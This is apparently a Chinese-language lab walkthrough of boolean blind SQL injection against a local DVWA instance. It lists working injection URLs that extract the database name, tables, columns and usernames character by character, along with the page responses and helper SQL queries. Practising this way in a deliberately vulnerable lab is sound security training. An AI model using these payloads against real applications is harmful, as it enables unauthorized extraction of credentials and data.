盲注（布尔盲注：利用页面对条件真假的不同响应，逐位推断数据）
猜数据库长度
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit#
User ID exists in the database.
得出 database() 长度为 4（条件为真时页面返回 "User ID exists"，为假时返回 "User ID is MISSING"，据此判断真假）
猜解数据库的名字
-- Local scratch queries (run directly against MySQL) used to build the
-- comparisons sent by the blind probe above.

-- Step 1: ASCII codes of the letters expected in the schema name.
SELECT ASCII('d'); -- 100
SELECT ASCII('v'); -- 118
SELECT ASCII('w'); -- 119
SELECT ASCII('a'); -- 97

-- Step 2: one character of the current schema name per query
-- (1-based position, length 1).
SELECT SUBSTRING(DATABASE(), 1, 1); -- d
SELECT SUBSTRING(DATABASE(), 2, 1); -- v
SELECT SUBSTRING(DATABASE(), 3, 1); -- w
SELECT SUBSTRING(DATABASE(), 4, 1); -- a

-- Step 3: the equality form the probe uses; each row is 1 (true).
SELECT ASCII('d') = 100; -- 1
SELECT ASCII('v') = 118; -- 1
SELECT ASCII('w') = 119; -- 1
SELECT ASCII('a') = 97;  -- 1
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=99--+&Submit=Submit#
User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=100--+&Submit=Submit#
User ID exists in the database.
得出 database() 第一个字符是 'd'（ASCII 100）
同理得出第二个字符是 'v'、第三个字符是 'w'、第四个字符是 'a'
得出数据库名database() = 'dvwa'
猜解dvwa数据库中的表个数
-- Table count of the current schema, tested against candidate values.
-- An aggregate without GROUP BY yields exactly one 0/1 row, so the
-- nested form in the notes is not needed; the notes record 1 only for
-- the candidate 2.
-- Defender note: this probe works because the app's DB account can read
-- information_schema and the `id` value appears to be spliced into the
-- SQL string; a least-privilege account and parameterized queries both
-- narrow this channel.
SELECT COUNT(table_name) = 1 FROM information_schema.tables WHERE table_schema = DATABASE(); -- 0
SELECT COUNT(table_name) = 2 FROM information_schema.tables WHERE table_schema = DATABASE(); -- 1
SELECT COUNT(table_name) = 3 FROM information_schema.tables WHERE table_schema = DATABASE(); -- 0
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2)--+&Submit=Submit#
#--> User ID exists in the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3)--+&Submit=Submit#
#--> User ID is MISSING from the database.
得出dvwa数据库中的表数量为2
猜解dvwa数据库中第一张表表名的第一个字符
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=102)--+&Submit=Submit#
#--> User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=103)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为g
同理得第二个字符
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),2,1))=117)--+&Submit=Submit#
#--> User ID exists in the database.
得到第二个字符为 u
同理可得第一张表名为 guestbook，第二张表名为 users
猜解dvwa数据库中的users表的字段数
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name= 'users' AND TABLE_SCHEMA='dvwa')=8)--+&Submit=Submit#
#--> User ID exists in the database.
得到:users表一共有8个字段
猜解dvwa数据库中的users表的具体字段
#--> LIMIT 6,1 选到第 7 个字段（偏移 6），即 user 字段
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND(ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),1,1))=117)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),2,1))=115)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),3,1))=101)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),4,1))=114)--+&Submit=Submit#
#--> User ID exists in the database.
-- ASCII codes of the letters of the expected column name "user";
-- these are the constants compared in the probes above.
SELECT ASCII('u'); -- 117
SELECT ASCII('s'); -- 115
SELECT ASCII('e'); -- 101
SELECT ASCII('r'); -- 114
#--> 得到users表的字段user
同上得到users表的字段password
猜解users表中的user字段值
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND length(substr((select user from users limit 0,1),1))=5--+&Submit=Submit#
User ID exists in the database. 说明 user 字段第 1 个值的字符长度为 5
-- ASCII codes of the letters of the expected first user value "admin";
-- these are the constants compared in the probes below.
SELECT ASCII('a'); -- 97
SELECT ASCII('d'); -- 100
SELECT ASCII('m'); -- 109
SELECT ASCII('i'); -- 105
SELECT ASCII('n'); -- 110
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),1,1))=97))--+&Submit=Submit#
#第一个字段值的第一个字符a
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),2,1))=100))--+&Submit=Submit#
#第一个字段值的第二个字符d
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),3,1))=109))--+&Submit=Submit#
#第一个字段值的第三个字符m
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),4,1))=105))--+&Submit=Submit#
#第一个字段值的第四个字符i
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),5,1))=110))--+&Submit=Submit#
#第一个字段值的第五个字符n
组合得到:admin
同理，对 user 字段的第二个值 (SELECT USER FROM users LIMIT 1,1) 逐字符尝试，得到：Gordonb
同上,猜解users表中的password字段值。
结束。